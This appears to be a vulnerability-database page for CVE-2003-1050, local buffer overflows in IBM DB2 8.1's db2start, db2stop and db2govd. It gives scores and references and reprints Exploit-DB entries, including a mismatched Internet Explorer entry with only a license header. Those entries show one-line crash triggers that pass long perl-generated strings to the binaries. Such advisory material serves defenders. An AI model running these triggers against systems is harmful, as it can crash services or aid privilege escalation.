CVE-2003-1050
published 2004-09-28CVE-2003-1050: Multiple buffer overflows in IBM DB2 Universal Database 8.1 may allow local users to execute arbitrary code via long command line arguments to (1) db2start…
PriorityP426high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.39%
68.9th percentile
Multiple buffer overflows in IBM DB2 Universal Database 8.1 may allow local users to execute arbitrary code via long command line arguments to (1) db2start, (2) db2stop, or (3) db2govd.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
exploitdb·2004-11-02
CVE-2004-1050 Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow
---
BoF PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever
`"YSSP" sSS
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston,
Exploit-DB
IBM DB2 - 'db2stop' Command Line Argument Local Overflow
exploitdb·2003-11-07
CVE-2003-1050 IBM DB2 - 'db2stop' Command Line Argument Local Overflow
IBM DB2 - 'db2stop' Command Line Argument Local Overflow
---
source: https://www.securityfocus.com/bid/8990/info
IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges.
[kf@RiotStarter adm]$ ./db2stop `perl -e 'print "A" x 4001'`
Segmentation fault
Exploit-DB
IBM DB2 - 'db2govd' Command Line Argument Local Overflow
exploitdb·2003-11-07
CVE-2003-1050 IBM DB2 - 'db2govd' Command Line Argument Local Overflow
IBM DB2 - 'db2govd' Command Line Argument Local Overflow
---
source: https://www.securityfocus.com/bid/8990/info
IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges.
[db2inst1@RiotStarter adm]$ ./db2govd stop a `perl -e 'print "A" x 65'`
Segmentation fault
Exploit-DB
IBM DB2 - 'db2start' Command Line Argument Local Overflow
exploitdb·2003-11-07
CVE-2003-1050 IBM DB2 - 'db2start' Command Line Argument Local Overflow
IBM DB2 - 'db2start' Command Line Argument Local Overflow
---
source: https://www.securityfocus.com/bid/8990/info
IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges.
[kf@RiotStarter adm]$ source /home/db2inst1/sqllib/db2profile
[kf@RiotStarter adm]$ ./db2start `perl -e 'print "A" x 9901'`
S
No writeups or analysis indexed.
http://www.secnetops.com/research/advisories/SRT2003-11-06-0710.txthttp://www.securityfocus.com/archive/1/343804http://www.securityfocus.com/bid/8990https://exchange.xforce.ibmcloud.com/vulnerabilities/13633http://www.secnetops.com/research/advisories/SRT2003-11-06-0710.txthttp://www.securityfocus.com/archive/1/343804http://www.securityfocus.com/bid/8990https://exchange.xforce.ibmcloud.com/vulnerabilities/13633
2004-09-28
Published